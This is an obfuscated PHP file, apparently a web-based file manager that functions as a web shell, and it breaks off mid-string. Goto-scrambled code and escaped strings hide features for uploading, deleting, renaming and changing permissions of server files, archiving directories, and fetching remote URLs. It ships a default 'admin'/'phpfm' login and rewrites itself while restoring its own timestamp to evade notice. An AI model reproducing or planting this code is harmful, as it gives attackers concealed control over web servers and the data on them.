baHFA: $JD5XC = isset($_GET["\x75\162\154"]) ? $_GET["\165\162\154"] : ''; goto zVIrW; WAS0_: $VEMW5 = str_replace("\46\141\x6d\x70\73", "\x26", $JfK9U[2]); goto baHFA; YaXeo: if ($JfK9U[1] == "\150\x72\x65\146" && !strripos($VEMW5, "\143\163\x73")) { goto ck7BL; } goto blDi0; hAdod: ck7BL: goto EyizD; Tu2K_: rGzSA: goto Gtogc; BlDP4: Wgrc1: goto kaVX0; HIPeL: goto rGzSA; goto SZuaF; zVIrW: $fBIND = parse_url($JD5XC); goto uIilc; YBajB: if (substr($VEMW5, 0, 2) == "\57\x2f") { goto aGvA0; } goto sjHbF; uIilc: $Mbf3m = $fBIND["\x73\x63\150\x65\155\145"] . "\72\57\57" . $fBIND["\x68\x6f\x73\164"] . "\x2f"; goto YBajB; lQIek: $VEMW5 = substr_replace($VEMW5, iWVtf(), 0, 2); goto Rledr; mWrBy: WAiyb: goto HIPeL; blDi0: if (strripos($VEMW5, "\143\x73\163")) { goto SW8s2; } goto xFeZp; TytGt: goto mEZNF; goto hAdod; Gtogc: goto UmNso; goto BlDP4; g7Ah4: $VEMW5 = $dDGCD . urlencode($VEMW5); goto i8uh8; f8EhG: UmNso: goto u96xf; SZuaF: Sh372: goto w1D8i; CKQxv: } goto gnT_J; dNdzm: echo "\74\x74\141\142\x6c\145\40\x63\x6c\141\x73\x73\x3d\42\x77\150\157\x6c\x65\x22\76\xd\xa\x3c\164\x72\x3e\15\12\40\x20\40\40\x3c\164\x68\x3e"; goto sPMnp; j5KuH: function RSfd0($YUrxT = false) { return "\46\x6e\142\163\160\x3b\74\x61\40\150\162\x65\x66\x3d\x22" . M576d($YUrxT) . "\42\40\164\151\x74\154\145\75\42" . niHJE("\x48\x6f\x6d\145") . "\42\x3e\74\x73\160\x61\156\x20\x63\x6c\x61\x73\x73\x3d\42\150\x6f\155\x65\42\76\x26\x6e\x62\163\x70\x3b\46\156\x62\163\160\73\46\x6e\x62\163\160\x3b\46\x6e\142\163\x70\73\74\x2f\x73\x70\141\x6e\76\74\57\141\x3e"; } goto SK0zR; qbQMT: $mRqUG = isset($_POST[$BXCqO . "\x5f\x74\160\154"]) ? $_POST[$BXCqO . "\x5f\x74\x70\x6c"] : ''; goto DRoLy; aerBc: r2v1X: goto GPuDq; u7ilY: bTJqg: goto PdgVw; v3wS6: TlMF9: goto vzJqd; ZxIsu: y068l: goto kGEgr; gyOUP: goto vWdBF; goto ioe0E; YKiBT: unset($_COOKIE[$OS8TV["\x63\x6f\157\153\x69\x65\137\x6e\141\155\145"]]); goto u0JQD; IKr8N: echo "\x22\76"; goto s5OOO; IIW37: $kHeOm = WaX6m($QxlDp . $_REQUEST["\162\151\147\x68\164\163"], true); goto ONDfs; VOeYS: echo "\x22\76\xd\12\x20\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20"; goto O1opk; frJu6: $ag5LK = $zBDAR . "\46\x70\141\x74\150\x3d" . $QxlDp; goto q48nI; KuUP6: if (empty($JfK9U[1])) { goto rRUVZ; } goto qbIqH; DAYQA: if (empty($dVmsi["\146\x6d\137\x72\145\163\x74\157\162\x65\x5f\164\151\155\145"])) { goto TbRXT; } goto a1R8c; xHjYR: if (v4LN8($QxlDp . $_REQUEST["\162\151\147\150\164\163"], j8IxI($_REQUEST["\x72\151\147\x68\164\163\137\166\141\154"]), @$_REQUEST["\162\145\x63\x75\162\x73\151\166\x65\154\171"])) { goto V9FDh; } goto Vbtnw; QqG25: hxE4y: goto w1jwK; xnruo: echo "\x3c\x2f\164\x68\x3e\xd\xa\74\57\x74\162\x3e\15\12\x3c\x74\162\x3e\xd\xa\x20\x20\x20\x20\x3c\x74\144\40\143\154\141\x73\x73\75\42\x72\157\167\61\x22\76\15\12\x20\40\x20\40\x20\x20\x20\40"; goto hgJF3; ExZ7T: x70U_: goto QyVST; Qyh_Q: echo "\42\x3e\xd\xa\11\11\x9\11\x3c\151\x6e\160\165\x74\40\x74\x79\x70\x65\x3d\42\x68\151\144\x64\x65\x6e\42\40\156\141\x6d\x65\75\x22\160\141\164\150\x22\x20\166\141\154\x75\145\x3d\x22"; goto serWE; SCftS: echo "\x9\x9\x9\74\57\164\144\76\xd\xa\x9\11\11\74\x74\x64\x3e\15\xa\x9\x9\11"; goto nWb7C; s5OOO: echo niHJE("\x42\x61\x63\x6b"); goto PtRBf; qYSem: echo "\42\x3e"; goto plhv1; Hq9_v: echo "\74\x2f\x74\142\x6f\x64\171\x3e\xd\12\74\57\x74\141\142\x6c\145\x3e\15\xa\74\144\151\x76\x20\x63\x6c\x61\163\x73\x3d\x22\x72\x6f\x77\63\x22\x3e"; goto x2_2e; UJMd2: if (!empty($_REQUEST["\144\145\154\145\164\x65"]) && $_REQUEST["\144\145\154\145\164\145"] != "\56") { goto uVDgZ; } goto yl4j3; Wjtok: echo $ag5LK; goto IKr8N; d922t: a9qFg: goto coRMj; B4Ikr: goto LVKvG; goto SNJwa; PR1_2: $z4gZL = "\173\42\123\145\164\164\x69\156\147\163\42\72\x22\x67\154\x6f\x62\x61\154\40\44\x66\155\x5f\x63\x6f\156\146\151\x67\x3b\x5c\162\x5c\x6e\166\x61\162\137\145\x78\160\157\162\x74\x28\44\x66\155\x5f\x63\x6f\x6e\146\151\147\x29\73\42\x2c\42\x42\x61\143\153\165\x70\40\123\121\114\40\164\x61\x62\154\145\x73\x22\72\42\145\x63\150\157\x20\146\155\x5f\142\x61\143\x6b\165\x70\137\164\x61\142\x6c\x65\163\50\51\x3b\42\x7d"; goto xhlhm; hxgNg: yvLEw: goto c60sy; kl5t1: $PhGcO .= niHJE("\x45\162\x72\157\162\x20\157\x63\x63\x75\162\x72\145\144"); goto T9RUs; HqA11: echo "\x3c\x21\144\x6f\x63\164\x79\160\145\40\150\x74\x6d\154\x3e\xd\xa\74\150\164\155\x6c\x3e\15\12\74\150\x65\x61\x64\76\40\40\x20\x20\x20\15\12\11\74\155\145\x74\x61\40\x63\x68\141\x72\163\x65\x74\x3d\x22\165\164\x66\x2d\70\x22\x20\x2f\x3e\15\12\11\x3c\x6d\145\x74\x61\x20\x6e\141\x6d\145\75\x22\166\151\x65\167\160\157\162\164\42\40\143\x6f\x6e\164\x65\x6e\x74\x3d\42\x77\151\x64\x74\x68\75\144\x65\166\151\143\x65\x2d\x77\151\144\164\x68\x2c\40\x69\156\151\164\x69\x61\154\55\x73\143\141\x6c\145\x3d\x31\x22\40\x2f\76\xd\12\40\40\40\40\74\x74\151\x74\154\145\x3e"; goto Iz2bM; NfshS: $s9IZn->buildFromDirectory($uR23x); goto KUoDU; AKHwj: echo GMdhs("\160\x68\160"); goto ytWM1; qSV2c: echo "\x3c\x2f\164\144\x3e\74\x2f\x74\162\76\74\x2f\x74\x61\x62\154\x65\x3e\x3c\57\164\x64\76\xd\xa\74\57\x74\162\76\xd\xa\x3c\164\x72\x3e\15\xa\40\40\x20\40\x3c\164\144\x20\x63\x6c\141\x73\x73\75\x22\162\157\167\x31\x22\x3e\15\12\x9\11\74\141\x20\x68\162\x65\146\75\x22"; goto AycMa; WEzI6: $PhGcO .= nIHje("\106\151\x6c\x65\40\165\x70\144\141\164\x65\144"); goto OLxVV; MuhsT: eE_vj: goto Sweu1; wbXM2: echo "\42\76\15\xa\40\40\x20\x20\x20\x20\x20\40\74\57\146\x6f\162\155\x3e\15\12\40\x20\40\x20\74\57\x74\x64\x3e\15\12\x3c\57\x74\162\x3e\xd\12\x3c\x2f\164\141\x62\x6c\x65\76\15\xa"; goto y0WGA; iUBP6: goto d8h8l; goto lnJeR; h1BOx: echo NiHje("\102\x61\143\x6b"); goto BWorC; DIS1P: echo NIHje("\102\141\x63\x6b"); goto lxG1P; KVcJF: if (!$OS8TV["\x61\165\x74\150\157\x72\x69\172\x65"]) { goto Lp30c; } goto zb_39; pChwZ: if (file_put_contents(__FILE__, $qCxFq)) { goto PS_Cf; } goto QtLPf; dfhe2: $oRnJP = "\173\x22\151\x64\x22\72\42\x65\156\x22\x2c\x22\x41\x64\144\x22\72\x22\101\144\144\42\54\42\x41\162\x65\x20\x79\157\165\40\x73\165\x72\x65\x20\171\x6f\x75\40\x77\141\x6e\164\x20\164\x6f\40\144\145\x6c\145\164\145\x20\x74\150\x69\x73\40\x64\x69\162\x65\143\x74\x6f\162\x79\x20\50\x72\145\x63\x75\x72\163\151\x76\x65\154\x79\x29\77\x22\72\x22\101\162\145\40\171\x6f\x75\40\x73\165\162\145\40\x79\x6f\x75\x20\167\x61\x6e\x74\40\x74\157\40\144\x65\154\x65\164\x65\40\x74\150\x69\163\x20\x64\151\x72\x65\x63\164\157\162\x79\40\x28\x72\145\x63\165\x72\163\x69\166\x65\x6c\x79\51\x3f\42\54\42\101\x72\145\x20\171\157\x75\40\163\165\162\x65\40\171\157\165\40\x77\141\156\x74\x20\x74\157\x20\144\145\154\145\164\145\40\x74\x68\x69\x73\40\146\151\154\x65\77\x22\72\x22\101\162\x65\x20\x79\157\165\x20\163\x75\162\x65\x20\171\x6f\165\x20\167\141\x6e\164\x20\x74\157\40\144\x65\x6c\145\164\x65\x20\x74\x68\151\x73\40\146\x69\x6c\145\77\42\54\42\x41\x72\x63\x68\151\x76\151\156\x67\x22\x3a\42\x41\162\143\x68\151\166\x69\156\147\42\x2c\42\x41\165\164\150\x6f\x72\151\172\x61\x74\x69\157\x6e\42\72\x22\101\x75\x74\150\x6f\162\x69\x7a\x61\x74\151\157\x6e\42\54\42\102\141\x63\153\42\72\x22\102\141\x63\x6b\x22\54\x22\x43\x61\x6e\x63\x65\x6c\42\72\42\103\141\156\143\x65\x6c\x22\54\x22\x43\150\x69\x6e\x65\163\145\x22\x3a\42\x43\150\x69\x6e\145\163\145\42\54\42\103\157\155\x70\x72\145\163\x73\42\x3a\42\103\x6f\x6d\x70\x72\x65\163\x73\x22\x2c\42\x43\x6f\156\163\157\x6c\145\x22\72\x22\x43\157\156\163\157\154\145\42\x2c\x22\x43\x6f\x6f\x6b\151\x65\42\x3a\42\103\157\x6f\153\x69\x65\x22\54\42\103\162\145\141\x74\145\144\x22\72\42\x43\x72\x65\141\x74\x65\144\42\x2c\x22\x44\141\164\x65\x22\x3a\42\104\141\164\145\x22\x2c\x22\104\x61\171\x73\42\x3a\42\104\141\171\163\42\54\x22\104\x65\143\157\155\160\x72\145\x73\163\x22\x3a\42\x44\x65\x63\157\155\x70\x72\x65\x73\x73\x22\54\x22\x44\x65\154\145\x74\145\x22\72\42\x44\145\154\145\x74\x65\42\x2c\42\x44\145\x6c\x65\x74\145\144\x22\72\x22\x44\x65\154\x65\164\145\x64\x22\x2c\42\x44\157\x77\156\154\x6f\x61\144\x22\x3a\42\x44\x6f\167\156\x6c\157\x61\x64\x22\54\x22\x64\157\156\x65\42\x3a\x22\144\x6f\x6e\x65\42\54\42\x45\144\151\164\x22\72\x22\105\144\x69\164\x22\54\42\x45\x6e\164\145\162\x22\x3a\x22\x45\x6e\164\x65\x72\x22\54\42\105\x6e\147\154\x69\x73\x68\42\72\42\105\156\x67\154\x69\163\150\42\x2c\x22\x45\x72\x72\157\x72\x20\157\143\x63\165\x72\x72\145\x64\x22\x3a\42\x45\162\162\157\x72\x20\x6f\x63\x63\x75\x72\x72\145\144\x22\x2c\x22\x46\x69\154\145\40\155\141\156\x61\147\145\162\42\x3a\x22\x46\x69\x6c\x65\x20\155\x61\156\141\x67\145\x72\42\x2c\x22\x46\151\x6c\x65\x20\x73\145\154\x65\143\x74\x65\144\x22\x3a\42\x46\x69\x6c\145\40\x73\x65\154\x65\143\164\145\144\x22\x2c\x22\x46\151\154\145\x20\x75\160\144\x61\x74\x65\x64\x22\72\42\x46\151\x6c\x65\40\165\x70\x64\x61\x74\145\144\x22\54\42\106\151\154\x65\156\x61\155\x65\x22\72\x22\x46\151\x6c\x65\x6e\141\155\145\x22\54\x22\106\151\154\x65\163\40\x75\160\x6c\x6f\141\x64\145\144\42\x3a\x22\106\x69\x6c\145\x73\x20\x75\160\x6c\157\141\144\145\144\x22\x2c\42\106\x72\145\156\143\x68\x22\x3a\x22\106\162\145\156\x63\150\42\54\x22\x47\145\156\145\x72\141\x74\151\x6f\x6e\x20\x74\151\x6d\x65\x22\x3a\x22\x47\145\156\x65\x72\x61\164\151\157\x6e\40\x74\151\x6d\x65\42\54\42\x47\145\162\x6d\141\156\42\72\42\x47\145\162\x6d\x61\x6e\x22\x2c\x22\110\157\155\145\x22\x3a\x22\110\157\155\145\x22\x2c\42\x51\165\151\164\42\x3a\x22\121\x75\151\164\x22\54\x22\114\141\x6e\x67\x75\x61\147\145\42\x3a\x22\114\141\156\x67\x75\x61\x67\x65\x22\54\42\114\157\x67\151\156\x22\72\x22\x4c\x6f\147\x69\156\x22\x2c\42\x4d\141\156\x61\x67\145\42\x3a\42\x4d\141\156\141\x67\x65\x22\54\42\x4d\141\x6b\x65\x20\144\x69\162\145\143\x74\x6f\x72\x79\x22\72\x22\115\x61\153\145\x20\144\x69\x72\x65\x63\x74\x6f\162\x79\x22\x2c\42\116\x61\x6d\x65\x22\x3a\x22\x4e\x61\155\145\42\54\x22\116\145\167\x22\x3a\x22\x4e\x65\167\x22\54\42\116\x65\167\40\x66\151\154\x65\42\72\x22\x4e\145\x77\40\x66\151\x6c\145\42\x2c\x22\156\157\40\x66\x69\154\x65\163\x22\x3a\42\156\x6f\x20\x66\151\154\145\x73\x22\54\x22\120\141\x73\x73\167\x6f\162\144\x22\x3a\42\120\x61\163\163\x77\x6f\162\144\x22\54\x22\x70\x69\143\164\165\x72\145\163\42\72\x22\160\x69\x63\164\x75\162\145\163\x22\54\42\x52\x65\143\165\162\x73\151\x76\145\154\x79\x22\x3a\x22\x52\145\143\165\162\x73\151\166\x65\154\x79\42\x2c\x22\122\x65\156\141\155\145\x22\x3a\42\x52\145\x6e\x61\155\145\x22\54\x22\122\145\163\x65\x74\42\72\42\122\145\163\x65\x74\42\54\x22\122\x65\x73\145\x74\x20\163\x65\x74\x74\x69\156\x67\x73\42\x3a\42\122\145\163\x65\x74\x20\x73\145\x74\164\x69\156\147\x73\42\x2c\x22\x52\145\x73\x74\x6f\162\x65\x20\x66\151\154\145\40\x74\151\x6d\145\x20\x61\x66\x74\x65\x72\x20\x65\x64\x69\164\x69\x6e\147\x22\x3a\x22\122\145\x73\x74\x6f\162\x65\x20\146\151\x6c\x65\x20\x74\x69\155\145\40\x61\146\x74\145\x72\40\x65\144\x69\x74\151\x6e\147\x22\54\42\x52\x65\163\165\x6c\x74\42\x3a\x22\122\x65\x73\165\x6c\x74\x22\x2c\42\x52\x69\147\150\164\163\42\x3a\42\122\151\147\x68\164\163\42\x2c\x22\122\165\x73\x73\151\x61\156\42\x3a\42\x52\165\163\x73\151\141\x6e\x22\54\42\x53\141\166\x65\x22\x3a\42\123\x61\x76\x65\x22\x2c\42\x53\x65\154\x65\x63\164\x22\72\42\x53\x65\x6c\x65\x63\164\42\x2c\42\123\x65\154\145\143\164\40\164\150\x65\x20\146\151\x6c\x65\42\72\42\123\x65\154\x65\x63\164\x20\x74\150\145\40\x66\151\154\x65\x22\x2c\x22\x53\145\164\x74\x69\x6e\147\x73\42\72\42\x53\x65\x74\x74\151\156\x67\163\x22\54\x22\x53\150\157\x77\x22\x3a\42\123\x68\157\167\x22\x2c\42\123\x68\x6f\167\x20\163\x69\x7a\x65\40\157\x66\x20\x74\x68\x65\x20\146\x6f\x6c\x64\x65\162\42\72\42\x53\x68\157\167\x20\x73\151\x7a\x65\x20\157\146\40\164\x68\x65\40\146\157\x6c\x64\x65\x72\42\54\x22\123\151\172\145\42\x3a\42\x53\151\x7a\145\42\x2c\x22\x53\160\x61\156\x69\x73\x68\42\x3a\42\x53\x70\x61\156\151\x73\x68\x22\54\x22\x53\x75\142\155\151\x74\x22\72\x22\123\x75\142\x6d\151\164\42\x2c\x22\x54\x61\163\153\42\72\x22\x54\141\x73\153\x22\x2c\x22\x74\x65\155\160\x6c\141\164\145\x73\42\x3a\x22\164\x65\x6d\160\154\141\164\x65\163\x22\54\x22\125\x6b\x72\141\151\x6e\151\141\156\x22\x3a\x22\x55\153\162\x61\151\x6e\151\141\156\x22\54\x22\125\x70\x6c\x6f\x61\x64\42\72\42\125\160\154\157\141\144\42\x2c\x22\126\141\x6c\165\145\42\72\42\x56\141\154\165\x65\x22\x2c\x22\110\x65\x6c\x6c\x6f\42\x3a\42\110\x65\x6c\154\157\42\175"; goto LaK1Q; ibEHu: $scYTs .= "\74\x2f\x73\x65\154\x65\x63\164\76\12"; goto EadTE; C_Z6n: if (!isset($_GET["\144\x6f\167\x6e\x6c\x6f\141\144"])) { goto PKKXX; } goto ata4H; urLje: VdZ70: goto FmeAS; P48Ov: function JcgW8($M4E7H, $R_C6p = true) { goto wxG4Y; NVbl5: goto h9qvE; goto GL2x1; wxG4Y: if ($R_C6p) { goto UHN1r; } goto Y3wtN; Gg2jS: oG8_S: goto KKy6T; eSbY2: $n8Euz += filesize($M4E7H . "\x2f" . $HezPF); goto VwjjU; xTdq7: $n8Euz = JCGw8($M4E7H, false); goto Y7cNS; KZJbG: if ($n8Euz <= 1024 * 1024 * 1024 * 1024) { goto tqiVt; } goto VhaCW; WLG2U: $BFAh8 = opendir($M4E7H); goto jwMkS; gtYcl: $n8Euz = 0; goto WLG2U; VvNNF: if ($n8Euz <= 1024 * 1024 * 1024) { goto Dza6Q; } goto KZJbG; QKOwe: U_jTD: goto TQLWg; qi1JM: if (!is_file($M4E7H . "\57" . $HezPF)) { goto j7hVf; } goto eSbY2; kiPGe: return $n8Euz . "\40\x62\x79\x74\145\163"; goto cIVno; GL2x1: stddq: goto kiPGe; g5Mql: closedir($BFAh8); goto oqyVE; wKwmK: XEf_U: goto gtYcl; jwMkS: wl5Nt: goto TInAk; VhaCW: if ($n8Euz <= 1024 * 1024 * 1024 * 1024 * 1024) { goto oG8_S; } goto GUH2S; oqyVE: return $n8Euz + filesize($M4E7H); goto v_fW2; TInAk: if (!(($HezPF = readdir($BFAh8)) !== false)) { goto DElXC; } goto kYZ86; Y3wtN: if (!is_file($M4E7H)) { goto XEf_U; } goto DK0jU; QtglS: return round($n8Euz / 1024, 2) . "\46\x6e\x62\163\x70\73\x4b\142"; goto T4eGT; cIVno: h9qvE: goto QKOwe; De5Mz: HIXxd: goto amTUP; amTUP: goto pq5VR; goto ezTjd; kYZ86: if (!($HezPF == "\56" || $HezPF == "\56\56")) { goto Mc83q; } goto jjlkV; v_fW2: goto U_jTD; goto tpZjj; riWwz: goto NThWp; goto Gg2jS; TVKM0: return round($n8Euz / (1024 * 1024), 2) . "\46\156\142\x73\160\73\x4d\x62"; goto l6Xm4; j6M0s: Wpc8O: goto QtglS; KKy6T: return round($n8Euz / (1024 * 1024 * 1024 * 1024), 2) . "\x26\x6e\142\x73\x70\73\124\142"; goto nryhx; Y7cNS: if ($n8Euz <= 1024) { goto stddq; } goto gZI2s; VwjjU: j7hVf: goto tJUZj; GUH2S: return round($n8Euz / (1024 * 1024 * 1024 * 1024 * 1024), 2) . "\x26\x6e\142\163\160\x3b\120\x62"; goto riWwz; gZI2s: if ($n8Euz <= 1024 * 1024) { goto Wpc8O; } goto VvNNF; uW1la: goto wl5Nt; goto fR1IY; tJUZj: $n8Euz += jcGW8($M4E7H . "\x2f" . $HezPF, false); goto uW1la; DK0jU: return filesize($M4E7H); goto wKwmK; fR1IY: DElXC: goto g5Mql; ahtrc: tqiVt: goto W3msv; W3msv: return round($n8Euz / (1024 * 1024 * 1024), 2) . "\x26\x6e\142\x73\160\x3b\107\142"; goto De5Mz; PGJ0Y: goto HIXxd; goto ahtrc; tpZjj: UHN1r: goto xTdq7; aZtiq: goto RuzhR; goto j6M0s; nryhx: NThWp: goto PGJ0Y; jjlkV: Mc83q: goto qi1JM; ezTjd: Dza6Q: goto TVKM0; T4eGT: RuzhR: goto NVbl5; l6Xm4: pq5VR: goto aZtiq; TQLWg: } goto WrVLf; vg1hO: $BzzRQ = json_decode($mGXy2, true); goto YrM9E; hQQH3: zYJMt: goto XrxrW; H2yhm: $PhGcO .= nIhje("\x45\x72\x72\x6f\x72\40\x6f\143\x63\x75\x72\x72\x65\144") . "\72\x20" . nIhje("\x6e\157\x20\146\151\154\x65\x73"); goto cQi75; O1opk: echo nIhjE("\122\145\156\141\155\x65"); goto Tn0SD; ONDfs: $VEMW5 = $zBDAR . "\46\162\x69\147\x68\164\163\x3d" . $_REQUEST["\x72\151\x67\150\x74\x73"] . "\46\160\141\164\150\75" . $QxlDp; goto frJu6; ChmuZ: ZPfln: goto SCftS; BnBZQ: echo niHje("\x52\x65\163\145\164"); goto A2tq8; N3PaM: echo "\74\x74\x72\x3e\15\12\40\x20\x20\x20\x3c\164\144\x20\x63\154\141\163\163\x3d\x22\x72\x6f\167\x32\x22\x3e\15\12\x9\x9\74\x74\x61\142\x6c\x65\76\15\12\11\11\11\74\x74\x72\76\15\12\x9\11\11\x3c\x74\x64\76\xd\xa\x9\x9\x9\x9"; goto Mhsys; kyG45: echo NiHJe("\123\165\142\x6d\x69\x74"); goto ccdKt; R2JgP: echo "\11\x9\74\57\x74\x64\76\15\xa\11\x9\74\164\144\76\xd\12\x9\x9"; goto ndnwY; kzUQ4: echo "\74\x2f\x74\x64\x3e\xd\12\x3c\57\x74\x72\76\xd\xa"; goto jiBb0; bKofJ: $qu1x5 = preg_match("\x23\164\162\x61\156\163\x6c\141\x74\151\x6f\x6e\133\x5c\163\135\x3f\134\75\x5b\134\x73\135\77\47\134\173\134\42\x28\56\52\77\51\x5c\x22\x5c\x7d\x27\x3b\43", $BFNGe, $JfK9U); goto KuUP6; YAsDc: if (empty($lXLSC)) { goto b0iNl; } goto Ft3jK; kgP_8: if (!is_file($JV9b8 . "\x2e\147\172")) { goto WuJcn; } goto yQZio; a4AwT: if (!empty($_REQUEST["\x72\151\x67\150\x74\163"])) { goto y068l; } goto Y60mX; IH3BL: gju55: goto Kk3Gi; PtRBf: echo "\x3c\57\x61\x3e\15\12\11\74\57\164\144\76\xd\12\74\x2f\164\162\76\xd\12\x3c\164\x72\76\xd\12\40\40\40\40\74\x74\144\x20\143\154\141\x73\163\x3d\42\162\x6f\167\61\42\40\141\x6c\151\147\x6e\x3d\42\x63\x65\x6e\x74\145\162\x22\76\xd\12\40\x20\40\x20\x20\x20\x20\40\74\x66\157\162\155\40\156\141\155\145\75\42\146\x6f\x72\155\x31\42\x20\x6d\145\164\150\x6f\144\x3d\42\x70\157\163\164\42\x20\141\143\x74\x69\157\156\x3d\x22"; goto AvZCM; VotTi: $M3kdW = basename($uR23x) . "\x2e\164\141\x72"; goto oDz_N; Q1MTS: if (empty($JfK9U[1])) { goto lzs2b; } goto WwleT; k3DNE: pl9zG: goto Hq9_v; z7QZg: KD9r8: goto ecPLz; pytF5: if (is_file($JV9b8)) { goto osGNn; } goto H2yhm; vrEEu: echo "\40\x3c\x69\156\160\x75\x74\x20\164\171\160\x65\75\x22\x74\145\x78\x74\42\x20\156\x61\x6d\x65\x3d\42\x72\x69\147\150\164\163\137\x76\141\x6c\x22\40\x76\x61\x6c\x75\145\75\x22"; goto Rhf_V; wfzoe: echo "\x9\x3c\57\x74\144\76\15\12\x3c\x2f\x74\162\76\15\12\74\164\162\76\15\12\40\x20\x20\40\74\164\x64\x20\143\x6c\x61\163\x73\75\42\x72\157\167\61\42\x3e\xd\xa\40\40\40\40\x20\40\x20\x20\x3c\x61\x20\150\162\145\x66\x3d\x22"; goto c9Lnu; dt1sB: $v6aof = json_encode(json_decode(${$h17u3 . "\x5f\x74\x65\x6d\x70\154\x61\x74\x65\163"}, true) + array($_POST[$h17u3 . "\137\156\x65\x77\137\156\141\x6d\145"] => $_POST[$h17u3 . "\137\156\x65\x77\137\166\141\154\x75\145"]), JSON_HEX_APOS); goto LFd0H; VSguS: goto ktrt4; goto JqCn3; mnTRC: $qCxFq = str_replace("\173\x22" . $JfK9U[1] . "\x22\175", $v6aof, $BFNGe); goto WwiAU; iW20Z: echo rSfd0() . "\x20\174\40\x76\x65\162\56\40" . $v4fpP . "\x20\174\40\x3c\x61\40\x68\x72\x65\146\x3d\x22\x68\164\164\160\x73\x3a\57\57\147\151\x74\x68\165\x62\x2e\x63\157\155\57\104\x65\156\x31\x78\170\170\x2f\106\151\x6c\x65\155\x61\156\x61\x67\145\162\x22\x3e\x47\151\x74\150\x75\x62\x3c\x2f\x61\x3e\40\x20\174\40\x3c\141\x20\150\162\x65\x66\x3d\42" . kIMPw() . "\42\76\56\x3c\57\141\76"; goto FAKwP; B9YvS: $E3hht = "\x72\x75"; goto DBW_e; XlpAP: unlink($JV9b8); goto MQysG; gIr26: $PhGcO .= NihjE("\106\151\154\145\x20\165\160\x64\x61\x74\145\x64"); goto Q0REt; k0Rpy: echo "\x22\x3e"; goto DIS1P; fwVwS: rRUVZ: goto vg1hO; JXv42: if (!isset($_POST["\146\155\137\x6c\x61\x6e\x67"])) { goto r8k2s; } goto mzk9b; MtfrD: echo !empty($QxlDp) ? "\x20\x2d\x20" . $QxlDp : ''; goto jlC0n; vNqk1: $ag5LK = $zBDAR . "\46\x70\x61\x74\150\x3d" . $QxlDp; goto dNdzm; IrtsC: touch(__FILE__, $NMa_c); goto bAiQi; GP0Mm: $PhGcO .= NihJe("\x45\x72\x72\x6f\162\40\157\143\143\165\x72\x72\x65\144"); goto Jn0oO; gHlrO: $M3kdW = basename($uR23x) . "\56\x74\x61\162"; goto EEA2m; lwShD: echo "\x9\x3c\57\164\x64\76\15\xa\x3c\x2f\164\x72\x3e\15\xa\x3c\164\x72\76\xd\xa\x20\40\x20\x20\x3c\164\x64\40\143\154\x61\x73\x73\75\42\162\157\x77\x31\42\76\xd\12\x20\40\x20\x20\40\x20\40\x20\x3c\141\40\150\162\x65\146\75\x22"; goto X7rAG; VsrUA: if (!($_POST["\146\155\137\154\157\147\151\156"]["\160\x61\163\x73\167\157\162\x64"] != $OS8TV["\160\x61\163\163\167\x6f\x72\144"])) { goto Xwr_i; } goto jMVbw; e8bfM: if (empty($tQ9jK)) { goto BCQiP; } goto tRQtL; kJYUf: curl_setopt($AU30p, CURLOPT_RETURNTRANSFER, true); goto izPMR; MO0Ds: F1p0W: goto puZVe; UWN0F: I2JuJ: goto xns0G; kGK8F: $_COOKIE["\146\x6d\x5f\143\x6f\156\146\151\147"] = serialize($dVmsi); goto QX0Hf; UKFg4: $PhGcO .= NiHJe("\105\162\x72\x6f\162\40\x6f\x63\x63\x75\x72\162\x65\x64"); goto dKJYB; G9oNU: $s9IZn = new PharData($M3kdW); goto CXiK1; P5KuG: if (empty($_REQUEST["\x73\x61\166\x65"])) { goto Zphx4; } goto olOCz; w1jwK: uu4Dh: goto WFe3B; OLxVV: $_REQUEST["\162\x65\x6e\141\155\145"] = $_REQUEST["\156\145\x77\156\141\x6d\x65"]; goto fuNzP; WwleT: $NMa_c = filemtime(__FILE__); goto evO0R; wrdVY: $NMa_c = filemtime($Kh5Cp); goto qFjcg; UPfDi: N59wz: goto RwUYM; NufMd: $q2HJ9 = $E3hht; goto J3tzZ; dJ3Xa: $PhGcO .= Nihje("\124\141\163\x6b") . "\40\x22" . NIhJe("\101\x72\x63\150\x69\x76\151\x6e\147") . "\x20" . $M3kdW . "\x22\x20" . nIHJE("\x64\x6f\x6e\x65") . "\x2e\46\x6e\x62\163\160\73" . MiMD1("\x64\157\x77\156\x6c\x6f\x61\x64", $QxlDp . $M3kdW, nIhJe("\104\x6f\x77\x6e\x6c\x6f\x61\144"), nihJE("\x44\157\167\156\x6c\x6f\x61\144") . "\40" . $M3kdW) . "\x26\156\142\x73\x70\73\x3c\x61\x20\150\162\145\146\75\x22" . $zBDAR . "\x26\x64\145\x6c\x65\x74\145\75" . $M3kdW . "\46\x70\141\164\150\75" . $QxlDp . "\42\x20\x74\x69\x74\x6c\145\75\42" . NIhje("\x44\x65\154\145\x74\145") . "\40" . $M3kdW . "\x22\40\x3e" . niHjE("\x44\145\154\145\x74\145") . "\x3c\x2f\x61\x3e"; goto bVlFw; ytWM1: echo "\x9\11\11\74\57\x74\144\76\15\xa\11\x9\11\x3c\164\144\x3e\15\xa\x9\x9\x9"; goto VL0sn; SbZNe: fclose($pMorP); goto igxwz; NgXtp: if (isset($_POST["\164\x70\x6c\x5f\x65\x64\x69\164\x65\144"])) { goto EEA1J; } goto vIznk; MyNMl: $PhGcO .= NIHjE("\105\x72\x72\x6f\162\40\157\143\143\x75\x72\x72\145\144"); goto ksoD3; ior6_: $Utwwz = "\173\x22\141\165\x74\150\x6f\162\x69\172\x65\x22\x3a\42\x30\42\x2c\x22\x6c\x6f\x67\151\x6e\x22\x3a\x22\x61\x64\155\x69\x6e\x22\x2c\42\160\x61\x73\163\x77\157\x72\x64\x22\x3a\x22\x70\150\160\x66\155\42\x2c\x22\143\157\x6f\x6b\151\x65\x5f\x6e\x61\x6d\x65\42\x3a\x22\x66\155\x5f\165\x73\145\x72\x22\54\x22\144\x61\x79\x73\137\x61\165\x74\150\157\162\x69\172\x61\164\x69\x6f\156\42\x3a\42\63\60\x22\54\x22\163\x63\162\151\x70\x74\x22\x3a\x22\74\x73\x63\x72\x69\160\164\x20\x74\x79\160\x65\x3d\x5c\x22\x74\145\170\164\x5c\57\152\x61\x76\141\163\143\x72\151\160\x74\x5c\x22\40\163\162\x63\75\x5c\x22\150\164\164\x70\x73\x3a\134\x2f\134\57\167\167\167\56\143\x64\x6f\154\151\166\145\x74\56\143\x6f\155\x5c\x2f\x65\144\x69\x74\x61\162\145\x61\134\57\x65\144\151\164\141\x72\x65\141\134\57\145\144\151\164\x5f\141\x72\x65\x61\134\57\x65\x64\x69\164\x5f\x61\x72\145\141\x5f\146\x75\x6c\154\56\152\x73\x5c\x22\x3e